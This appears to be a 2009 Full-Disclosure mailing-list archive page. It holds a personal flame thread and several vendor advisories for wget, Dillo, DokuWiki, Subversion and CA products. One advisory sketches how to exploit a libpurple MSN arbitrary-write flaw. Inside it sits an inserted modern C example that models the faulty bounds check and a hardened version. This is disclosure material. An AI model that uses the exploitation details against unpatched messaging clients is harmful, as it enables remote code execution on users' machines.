Re: [Full-disclosure] False statements made about security researcher n3td3v

2009-08-18 Thread Sub
n3td3v is neither black-, white-, purple- nor any other -hat, just a troll.
I have followed this list for 4 years, and everything I have read about
n3td3v was just a bunch of crap.

Just like the kids in school who have no friends and keep bugging
others for their lost lives.

So stop trolling with your fake account; it's worthless, senseless and
useless AND OFF-TOPIC.


someone lawyer wrote:
> List,
>
> My client set up a mailing list called "n3td3v"; he used the username
> "n3td3v" to spread the name of the user group so people would know it.
> Since then you have ridiculed and tormented him, to the degree that he
> was so upset he had to be removed from your list.
>
> There was no need for you to do this to him. He is a good guy; he proved
> he had no bad bones in his body before he was removed.
>
> Why, when he is no longer on your list, do you continue to want to
> believe he has bad bones in his body when everyone knows he is a good
> guy? He can get argumentative when he feels the need to defend himself
> when false statements are made; that doesn't make him bad.
>
> He is a good guy in the information security world. Let it be now; don't
> portray him as a black hat for your entertainment purposes, because
> people scanning through might not know it is a joke and you could cause
> damage to my client.
>
> some...@lawyer.com
>
> - Original Message -
> From: valdis.kletni...@vt.edu
> To: Full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] False statements made about security   
> researcher n3td3v
> Date: Tue, 18 Aug 2009 18:24:55 -0400
>
>
> On Tue, 18 Aug 2009 15:52:36 CDT, someone lawyer said:
>
>> What is funny about my client being targeted by internet trolls?
>
> The self-referential aspects of the situation.
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] False statements made about security researcher n3td3v

2009-08-18 Thread someone lawyer
List,

My client set up a mailing list called "n3td3v"; he used the username
"n3td3v" to spread the name of the user group so people would know it.
Since then you have ridiculed and tormented him, to the degree that he
was so upset he had to be removed from your list.

There was no need for you to do this to him. He is a good guy; he proved
he had no bad bones in his body before he was removed.

Why, when he is no longer on your list, do you continue to want to
believe he has bad bones in his body when everyone knows he is a good
guy? He can get argumentative when he feels the need to defend himself
when false statements are made; that doesn't make him bad.

He is a good guy in the information security world. Let it be now; don't
portray him as a black hat for your entertainment purposes, because
people scanning through might not know it is a joke and you could cause
damage to my client.

some...@lawyer.com

- Original Message -
From: valdis.kletni...@vt.edu
To: Full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] False statements made about security 
researcher n3td3v
Date: Tue, 18 Aug 2009 18:24:55 -0400


On Tue, 18 Aug 2009 15:52:36 CDT, someone lawyer said:
> What is funny about my client being targeted by internet trolls?

The self-referential aspects of the situation.



-- 
Be Yourself @ mail.com!
Choose From 200+ Email Addresses
Get a Free Account at www.mail.com!



[Full-disclosure] [ MDVSA-2009:206 ] wget

2009-08-18 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:206
 http://www.mandriva.com/security/
 ___

 Package : wget
 Date: August 18, 2009
 Affected: 2008.1, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in wget:
 
 SUSE discovered a security issue in wget related to
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408
 
 This update provides a solution to this vulnerability.
 ___

 Updated Packages:

 Mandriva Linux 2008.1:
 ea12db02d04adc9fa0b29e7236bc0aff  2008.1/i586/wget-1.11-1.1mdv2008.1.i586.rpm
 4bb0f6cea935f1898b16138a9184532d  2008.1/SRPMS/wget-1.11-1.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 b5d0178dafabf50dd69b65640794b343  2008.1/x86_64/wget-1.11-1.1mdv2008.1.x86_64.rpm
 4bb0f6cea935f1898b16138a9184532d  2008.1/SRPMS/wget-1.11-1.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 bede85ae45fadf868872897da49055c2  2009.0/i586/wget-1.11.4-1.1mdv2009.0.i586.rpm
 6790666e7840374f76f5713042791800  2009.0/SRPMS/wget-1.11.4-1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 4c3aa5dc0ff825c091f33a90e6413b18  2009.0/x86_64/wget-1.11.4-1.1mdv2009.0.x86_64.rpm
 6790666e7840374f76f5713042791800  2009.0/SRPMS/wget-1.11.4-1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 22ac17fb90755905810e06ba331aa3f0  2009.1/i586/wget-1.11.4-2.1mdv2009.1.i586.rpm
 e1cb10f372e5f447c66122cb7e21d838  2009.1/SRPMS/wget-1.11.4-2.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 ed2db26279ff964b66dab3d1c8131b24  2009.1/x86_64/wget-1.11.4-2.1mdv2009.1.x86_64.rpm
 e1cb10f372e5f447c66122cb7e21d838  2009.1/SRPMS/wget-1.11.4-2.1mdv2009.1.src.rpm

 Corporate 4.0:
 968c766ddae497261b5771809aadd05c  corporate/4.0/i586/wget-1.10-1.3.20060mlcs4.i586.rpm
 d68c51e4d12cc46284e74bcb3a49d2b3  corporate/4.0/SRPMS/wget-1.10-1.3.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 b22218a9f0e8d00eba91282955c8ff13  corporate/4.0/x86_64/wget-1.10-1.3.20060mlcs4.x86_64.rpm
 d68c51e4d12cc46284e74bcb3a49d2b3  corporate/4.0/SRPMS/wget-1.10-1.3.20060mlcs4.src.rpm

 Mandriva Enterprise Server 5:
 9f5a3d71664dc57fb26aebbc19c59fcb  mes5/i586/wget-1.11.4-1.1mdvmes5.i586.rpm
 f3aa17085ae5049ee3a5bf05e3119c43  mes5/SRPMS/wget-1.11.4-1.1mdvmes5.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 3a8dc29a12c1059182edbd8d732bc9df  mes5/x86_64/wget-1.11.4-1.1mdvmes5.x86_64.rpm
 f3aa17085ae5049ee3a5bf05e3119c43  mes5/SRPMS/wget-1.11.4-1.1mdvmes5.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFKiwtSmqjQ0CJFipgRAn13AKCh0YGh/7d6XI+RzW0968xgEIqqLACglzPt
/hPdLqxZ869FtuN+jpKVX/M=
=NfR+
-END PGP SIGNATURE-



Re: [Full-disclosure] False statements made about security researcher n3td3v

2009-08-18 Thread Valdis . Kletnieks
On Tue, 18 Aug 2009 15:52:36 CDT, someone lawyer said:
> What is funny about my client being targeted by internet trolls?

The self-referential aspects of the situation.



[Full-disclosure] CORE-2009-0727: Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability

2009-08-18 Thread CORE Security Technologies Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

  Core Security Technologies - CoreLabs Advisory
   http://www.coresecurity.com/corelabs/

Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability



1. *Advisory Information*

Title: Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability
Advisory ID: CORE-2009-0727
Advisory URL: http://www.coresecurity.com/content/libpurple-arbitrary-write
Date published: 2009-08-18
Date of last update: 2009-08-18
Vendors contacted: Pidgin team
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Memory corruption
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID:
CVE Name: CVE-2009-2694


3. *Vulnerability Description*

Pidgin (formerly named Gaim) is a multi-platform instant messaging
client, based on a library named libpurple. Libpurple has support for
many commonly used instant messaging protocols, allowing the user to log
into various different services from one application.

A remote arbitrary-code-execution vulnerability has been found in
Libpurple (used by Pidgin and Adium instant messaging clients, among
others), which can be triggered by a remote attacker by sending a
specially crafted MSNSLP packet [4] with invalid data to the client
through the MSN server. No victim interaction is required, and the
attacker is not required to be in the victim's buddy list (under default
configuration).


4. *Vulnerable packages*

   . Gaim >= 0.79
   . Libpurple <= 2.5.8 (Pidgin <= 2.5.8 and Adium <= 1.3.5)
   . Other Libpurple frontends such as Finch might be vulnerable as well.


5. *Non-vulnerable packages*

   . Libpurple >= 2.6.0 (Pidgin >= 2.6.0)


6. *Vendor Information, Solutions and Workarounds*

The default privacy settings allow any remote entity to contact an MSN
user, so the attacker is not required to be in the victim's buddy list.
The attack can be mitigated by setting the privacy settings for MSN
accounts to "Allow only the users below" (by default, the list of people
on the buddy list).


7. *Credits*

This vulnerability was discovered and researched by Federico Muttis from
Core Security Technologies.


8. *Technical Description / Proof of Concept Code*


8.1. *Overview*

The flaw exists within the function 'msn_slplink_process_msg()' of
Libpurple <= 2.5.8, which fails to properly validate an offset value
specified in a MSNSLP packet [4].

This affects at least two widely used products: Pidgin <= 2.5.8 [1] and
Adium <= 1.3.5 [2].

According to their website [3], Libpurple is also used by:

   . Apollo IM - IM application for the iPhone and iPod Touch.
   . EQO - an IM program for mobile phones.
   . Finch - a text-based IM program that works well in Linux and other
Unixes.
   . Instantbird - a graphical IM program based on Mozilla's XUL framework.
   . Meebo - a web-based IM program.
   . Telepathy-Haze - a connection manager for the Telepathy IM framework.

These programs may also be vulnerable.

If the victim's privacy settings are set to "everyone can contact me",
the attacker is not required to be in the victim's contact list.
Otherwise, being on that list is the only requirement for exploitation;
no other victim interaction is required.

By sending a specially crafted packet, an attacker can write an
arbitrary address with controlled data, resulting in arbitrary code
execution.


8.2. *Previous patches*

A similar vulnerability was already reported in CVE-2008-2927 [5] and
CVE-2009-1376 [6]. The fix for CVE-2008-2927 added some bounds checking
to 'msn_slplink_process_msg()', specifically:

/---

if (G_MAXSIZE - len < offset || (offset + len) > slpmsg->size)
{
    .. discard packet ..
} else {
    .. vulnerable memcpy ..
}

---/

CVE-2009-1376 demonstrated that this check could still be exploited. The
idea of the patch for CVE-2009-1376 was to fix a casting error, where an
unsigned 64-bit integer was cast to an unsigned 32-bit integer in the
following line:

/---

declaration of offset;
...
offset = msg->msnslp_header.offset;

---/

The declaration of 'offset' was changed from 'gsize' to 'guint64' in
2.5.8. This approach is clearly not enough: we found that by providing
different size/offset values, the call to memcpy() can still be reached
with almost any value. The first PoC we constructed to trigger this
vulnerability was fixed by the patch introduced in Libpurple 2.5.6, but
by working on it a little more we triggered the bug again in Libpurple
2.5.8. We conclude that the fix was incomplete.
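The checks discussed in this section, as an added example that is not libpurple or Pidgin code: it models (a) the bounds check quoted above for CVE-2008-2927, evaluated at the full 64-bit width of the wire offset, (b) the effect of the CVE-2009-1376 cast, where the same offset stored in a 32-bit gsize passes the check it fails at 64 bits, and (c) the destination the memcpy would use when no backing buffer exists, which is the attacker's offset itself, as section 8.3 below notes. That the base pointer is NULL in that case is an assumption about the mechanism, not a statement from the advisory. The types reasm_buf and write_status, the functions range_ok(), truncate_to_gsize32(), vulnerable_dest() and chunk_write(), and the sample data in main() are all hypothetical and constructed here.

```c
/* Added example, not libpurple/Pidgin code. Models the offset/length
 * validation described in the advisory; all names are hypothetical. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical reassembly state: 'size' is the total announced by the
 * first fragment; 'buffer' is allocated lazily, so it may still be NULL
 * when a later fragment arrives (assumption about the mechanism). */
typedef struct {
    uint8_t  *buffer;
    uint64_t  size;       /* announced total, not necessarily allocated */
    uint64_t  allocated;  /* bytes actually backing 'buffer' (0 if NULL) */
} reasm_buf;

typedef enum {
    WRITE_OK,
    WRITE_BAD_RANGE,     /* offset/len outside the announced size */
    WRITE_NO_BUFFER,     /* no backing buffer: buffer + offset is a raw address */
    WRITE_SIZE_MISMATCH  /* announced size exceeds what was allocated */
} write_status;

/* The check quoted in 8.2 for CVE-2008-2927, with 'offset' kept at its
 * full 64-bit wire width: rejects wraparound of offset + len and any
 * range past 'size'. Returns true when the range is acceptable. */
bool range_ok(uint64_t offset, size_t len, uint64_t size)
{
    if (UINT64_MAX - len < offset)      /* offset + len would wrap */
        return false;
    return offset + len <= size;
}

/* The CVE-2009-1376 cast: a 64-bit wire offset assigned to a 32-bit
 * gsize on a 32-bit build keeps only the low 32 bits. */
uint32_t truncate_to_gsize32(uint64_t wire_offset)
{
    return (uint32_t)wire_offset;
}

/* Where the vulnerable memcpy would write: buffer + offset. With no
 * backing buffer this is just the attacker-chosen offset, which is the
 * arbitrary-write primitive section 8.3 describes. Computed as an
 * integer so nothing is dereferenced. */
uintptr_t vulnerable_dest(const reasm_buf *m, uint64_t offset)
{
    return (uintptr_t)m->buffer + (uintptr_t)offset;
}

/* Hardened write: every precondition the memcpy relies on is checked
 * against the same 64-bit values, and the backing allocation is
 * verified, not only the announced size. */
write_status chunk_write(reasm_buf *m, uint64_t wire_offset,
                         const uint8_t *data, size_t len)
{
    if (m->buffer == NULL)
        return WRITE_NO_BUFFER;
    if (m->size > m->allocated)
        return WRITE_SIZE_MISMATCH;
    if (!range_ok(wire_offset, len, m->size))
        return WRITE_BAD_RANGE;
    memcpy(m->buffer + wire_offset, data, len);  /* in bounds by construction */
    return WRITE_OK;
}

int main(void)
{
    static uint8_t backing[64];
    reasm_buf with_buf = { backing, sizeof backing, sizeof backing };
    reasm_buf no_buf   = { NULL, 64, 0 };   /* fragment 1 seen, nothing allocated */
    const uint8_t payload[4] = { 0x41, 0x41, 0x41, 0x41 };  /* constructed sample */

    /* 1. A wire offset just past 2^32: rejected at 64 bits, accepted once
     *    truncated to 32 bits. Check and copy must agree on the width. */
    uint64_t wire = 0x100000010ULL;
    printf("64-bit check: %d, 32-bit check: %d\n",
           range_ok(wire, sizeof payload, with_buf.size),
           range_ok(truncate_to_gsize32(wire), sizeof payload, with_buf.size));

    /* 2. No backing buffer: the "destination" is the offset itself. */
    printf("dest with NULL buffer = 0x%llx\n",
           (unsigned long long)vulnerable_dest(&no_buf, 0x41414141ULL));

    /* 3. The hardened path rejects the same message, and accepts an
     *    in-range write into a real buffer. */
    printf("hardened, no buffer: %d\n",
           chunk_write(&no_buf, 0x41414141ULL, payload, sizeof payload));
    printf("hardened, in range: %d\n",
           chunk_write(&with_buf, 8, payload, sizeof payload));
    return 0;
}
```

The point of keeping `range_ok()` and `chunk_write()` on the same 64-bit values is that a check done on one width and a copy done on another can disagree, which is the class of problem the incomplete fixes above ran into; the `buffer == NULL` and `size > allocated` tests are the preconditions the memcpy silently relies on.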


8.3. *Exploitation of Libpurple 2.5.8*

The attack consists of sending two consecutive MSNSLP messages [4]. The
first one is used to store a 'slpmsg' with our session id, and the
second one to trigger the vulnerability.

Our goal is to reach the 'memcpy()' invocation in
'msn_slplink_process_msg()'. We need to construct a MSNSLP message with
an offset different from zero (as this value will be the destination of
the vulnerable 'memcpy()').

As the offset will be different from zero, the firs

[Full-disclosure] [ GLSA 200908-10 ] Dillo: User-assisted execution of arbitrary code

2009-08-18 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200908-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Dillo: User-assisted execution of arbitrary code
  Date: August 18, 2009
  Bugs: #276432
ID: 200908-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An integer overflow in the PNG handling of Dillo might result in the
remote execution of arbitrary code.

Background
==========

Dillo is a graphical web browser known for its speed and small
footprint.

Affected packages
=================

---
 Package            /  Vulnerable  /  Unaffected
---
  1  www-client/dillo      < 2.1.1        >= 2.1.1

Description
===========

Tilei Wang reported an integer overflow in the Png_datainfo_callback()
function, possibly leading to a heap-based buffer overflow.

Impact
======

A remote attacker could entice a user to open an HTML document
containing a specially crafted, large PNG image, possibly resulting in
the execution of arbitrary code with the privileges of the user running
the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Dillo users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =www-client/dillo-2.1.1

References
==========

  [ 1 ] CVE-2009-2294
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2294

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200908-10.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] [ GLSA 200908-09 ] DokuWiki: Local file inclusion

2009-08-18 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200908-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: DokuWiki: Local file inclusion
  Date: August 18, 2009
  Bugs: #272431
ID: 200908-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An input sanitization error in DokuWiki might lead to the disclosure of
local files or even the remote execution of arbitrary code.

Background
==========

DokuWiki is a standards compliant Wiki system written in PHP.

Affected packages
=================

---
 Package             /  Vulnerable     /  Unaffected
---
  1  www-apps/dokuwiki      < 2009-02-14b     >= 2009-02-14b

Description
===========

girex reported that data from the "config_cascade" parameter in
inc/init.php is not properly sanitized before being used.

Impact
======

A remote attacker could exploit this vulnerability to execute PHP code
from arbitrary local files or, when the PHP version in use supports
ftp:// URLs, also from remote files via FTP. Furthermore, it is possible
to disclose the contents of local files. NOTE: Successful exploitation
requires the PHP option "register_globals" to be enabled.

Workaround
==========

Disable "register_globals" in php.ini.

Resolution
==========

All DokuWiki users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =www-apps/dokuwiki-2009-02-14b

References
==========

  [ 1 ] CVE-2009-1960
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1960

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200908-09.xml




[Full-disclosure] [ GLSA 200908-08 ] ISC DHCP: dhcpd Denial of Service

2009-08-18 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200908-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: ISC DHCP: dhcpd Denial of Service
  Date: August 18, 2009
  Bugs: #275231
ID: 200908-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

dhcpd as included in the ISC DHCP implementation does not properly
handle special conditions, leading to a Denial of Service.

Background
==========

ISC DHCP is the reference implementation of the Dynamic Host
Configuration Protocol as specified in RFC 2131.

Affected packages
=================

---
 Package         /  Vulnerable  /  Unaffected
---
  1  net-misc/dhcp      < 3.1.2_p1      >= 3.1.2_p1

Description
===========

Christoph Biedl discovered that dhcpd does not properly handle certain
DHCP requests when configured both using "dhcp-client-identifier" and
"hardware ethernet".

Impact
======

A remote attacker might send a specially crafted request to dhcpd,
possibly resulting in a Denial of Service (daemon crash).

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All ISC DHCP users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-misc/dhcp-3.1.2_p1

References
==========

  [ 1 ] CVE-2009-1892
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1892

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200908-08.xml




[Full-disclosure] [ GLSA 200908-07 ] Perl Compress::Raw modules: Denial of Service

2009-08-18 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200908-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Perl Compress::Raw modules: Denial of Service
  Date: August 18, 2009
  Bugs: #273141, #281955
ID: 200908-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An off-by-one error in Compress::Raw::Zlib and Compress::Raw::Bzip2
might lead to a Denial of Service.

Background
==========

Compress::Raw::Zlib and Compress::Raw::Bzip2 are Perl low-level
interfaces to the zlib and bzip2 compression libraries.

Affected packages
=================

---
 Package                        /  Vulnerable  /  Unaffected
---
  1  perl-core/Compress-Raw-Zlib      < 2.020         >= 2.020
  2  perl-core/Compress-Raw-Bzip2     < 2.020         >= 2.020
---
 2 affected packages on all of their supported architectures.
---

Description
===========

Leo Bergolth reported an off-by-one error in the inflate() function in
Zlib.xs of Compress::Raw::Zlib, possibly leading to a heap-based buffer
overflow (CVE-2009-1391).

Paul Marquess discovered a similar vulnerability in the bzinflate()
function in Bzip2.xs of Compress::Raw::Bzip2 (CVE-2009-1884).

Impact
======

A remote attacker might entice a user or automated system (for instance
running SpamAssassin or AMaViS) to process specially crafted files,
possibly resulting in a Denial of Service condition.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Compress::Raw::Zlib users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =perl-core/Compress-Raw-Zlib-2.020

All Compress::Raw::Bzip2 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =perl-core/Compress-Raw-Bzip2-2.020

References
==========

  [ 1 ] CVE-2009-1391
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1391
  [ 2 ] CVE-2009-1884
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1884

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200908-07.xml




[Full-disclosure] [ GLSA 200908-06 ] CDF: User-assisted execution of arbitrary code

2009-08-18 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200908-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: CDF: User-assisted execution of arbitrary code
  Date: August 18, 2009
  Bugs: #278679
ID: 200908-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple heap-based buffer overflows in CDF might result in the
execution of arbitrary code.

Background
==========

CDF is a library for the Common Data Format, a self-describing data
format for the storage and manipulation of scalar and multidimensional
data. It is developed by NASA.

Affected packages
=================

---
 Package        /  Vulnerable  /  Unaffected
---
  1  sci-libs/cdf      < 3.3.0        >= 3.3.0

Description
===========

Leon Juranic reported multiple heap-based buffer overflows, for instance
in the ReadAEDRList64(), SearchForRecord_r_64(), LastRecord64(), and
CDFsel64() functions.

Impact
======

A remote attacker could entice a user to open a specially crafted CDF
file, possibly resulting in the execution of arbitrary code with the
privileges of the user running the application, or a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All CDF users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =sci-libs/cdf-3.3.0

References
==========

  [ 1 ] CVE-2009-2850
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2850

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200908-06.xml




[Full-disclosure] [ GLSA 200908-05 ] Subversion: Remote execution of arbitrary code

2009-08-18 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200908-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Subversion: Remote execution of arbitrary code
  Date: August 18, 2009
  Bugs: #280494
ID: 200908-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple integer overflows, leading to heap-based buffer overflows in
the Subversion client and server, might allow remote attackers to
execute arbitrary code.

Background
==========

Subversion is a versioning system designed to be a replacement for CVS.

Affected packages
=================

---
 Package               /  Vulnerable  /  Unaffected
---
  1  dev-util/subversion      < 1.6.4        >= 1.6.4

Description
===========

Matt Lewis of Google reported multiple integer overflows in the
libsvn_delta library, possibly leading to heap-based buffer overflows.

Impact
======

A remote attacker with commit access could exploit this vulnerability
by sending a specially crafted commit to a Subversion server, or a
remote attacker could entice a user to check out or update a repository
from a malicious Subversion server, possibly resulting in the execution
of arbitrary code with the privileges of the user running the server or
client.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Subversion users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-util/subversion-1.6.4

References
==========

  [ 1 ] CVE-2009-2411
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2411

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200908-05.xml




Re: [Full-disclosure] False statements made about security researcher n3td3v

2009-08-18 Thread someone lawyer
List,

What is funny about my client being targeted by internet trolls?

some...@lawyer.com

- Original Message -
From: "Andrew Kuriger" 
To: Full-disclosure@lists.grok.org.uk
Cc: Full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] False statements made about security researcher 
n3td3v
Date: Tue, 18 Aug 2009 14:53:20 -0500


Dude, really?

Nice signature: "Be Yourself @ mail.com!
Choose From 200+ Email Addresses
Get a Free Account at www.mail.com!"

Nobody cares. I just find it funny.

On Tue, 18 Aug 2009 14:43:15 -0500, "someone lawyer" 
wrote:
> List,
>
> Below are (malicious) false statements about my client.
>
> Thu Jul 16 13:54:34 BST 2009 ureleet at gmail.com "n3td3v is 
> posting as ant-sec"
>
> "he is hacking and spreading disinformation on
> full-d."
>
> http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069692.html
>
> Sun Jul 26 02:40:47 BST 2009
>
> antisecav at hushmail.com "Breaking: antisec and n3td3v 
> responsible for Matasano hacking"
>
> "n3td3v/antisec is proud to announce official partnership with 
> antisec ("the scene")"
>
> http://lists.grok.org.uk/pipermail/full-disclosure/2009-July/069878.html
>
> some...@lawyer.com






[Full-disclosure] CA20090818-01: Security Notice for CA Host-Based Intrusion Prevention System

2009-08-18 Thread Kotas, Kevin J
-BEGIN PGP SIGNED MESSAGE-

CA20090818-01: Security Notice for CA Host-Based Intrusion Prevention
System

Issued: August 18, 2009

CA's technical support is alerting customers to a security risk with
CA Host-Based Intrusion Prevention System. A vulnerability exists
that can allow a remote attacker to cause a denial of service. CA
has issued a patch to address the vulnerability.

The vulnerability, CVE-2009-2740, is due to the kmxIds.sys driver not
correctly handling certain malformed packets. An attacker can send a
malicious packet that will cause a kernel crash.

Risk Rating

High

Platform

Windows

Affected Products

CA Host-Based Intrusion Prevention System 8.1

Non-Affected Products

CA Host-Based Intrusion Prevention System 8.1 CF 1

How to determine if the installation is affected

1. Using Windows Explorer, locate the file "kmxIds.sys". By
default, the file is located in the
"C:\Windows\system32\drivers\" directory.
2. Right click on the file and select Properties.
3. Select the Version tab.
4. If the file version is less than indicated in the below table, the
installation is vulnerable.

File Name   Version   Size(bytes)  Date
kmxIds.sys  7.3.1.18  163,840      June 03, 2009, 12:32:22 PM

Solution

CA has issued the following patch to address the vulnerability.

CA Host-Based Intrusion Prevention System 8.1:
Install Cumulative Fix 1 RO10298.

References

CVE-2009-2740 - HIPS kmxIds.sys remote crash
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2740

CA20090818-01: Security Notice for CA Host-Based Intrusion Prevention
System
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=214665

Acknowledgement

CVE-2009-2740 - iViZ Security Research Team

Change History

Version 1.0: Initial Release

If additional information is required, please contact CA Support at
http://support.ca.com/

If you discover a vulnerability in CA products, please report your
findings to the CA Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782

Kevin Kotas
CA Product Vulnerability Response Team




[Full-disclosure] CA20090818-02: Security Notice for CA Internet Security Suite

2009-08-18 Thread Kotas, Kevin J
-BEGIN PGP SIGNED MESSAGE-

CA20090818-02: Security Notice for CA Internet Security Suite

Issued: August 18, 2009

CA's technical support is alerting customers to a security risk with
CA Internet Security Suite. A vulnerability exists that can allow a
local attacker to cause a denial of service. CA has issued updates
to address the vulnerability.

The vulnerability, CVE-2009-0682, is due to insufficient verification
of IOCTL calls by the vetmonnt.sys driver. An attacker can send a
malicious IOCTL call that will cause a crash.

Risk Rating

Medium

Platform

Windows

Affected Products

CA Internet Security Suite r3
CA Internet Security Suite r4 32 bit
CA Internet Security Suite r5 32 bit

How to determine if the installation is affected

From the Internet Security Suite user interface, select Help->About
to show the version. If the displayed version is less than what is
indicated in the below table, the installation is vulnerable.

Product                     Version
Internet Security Suite r4  9.0.0.184
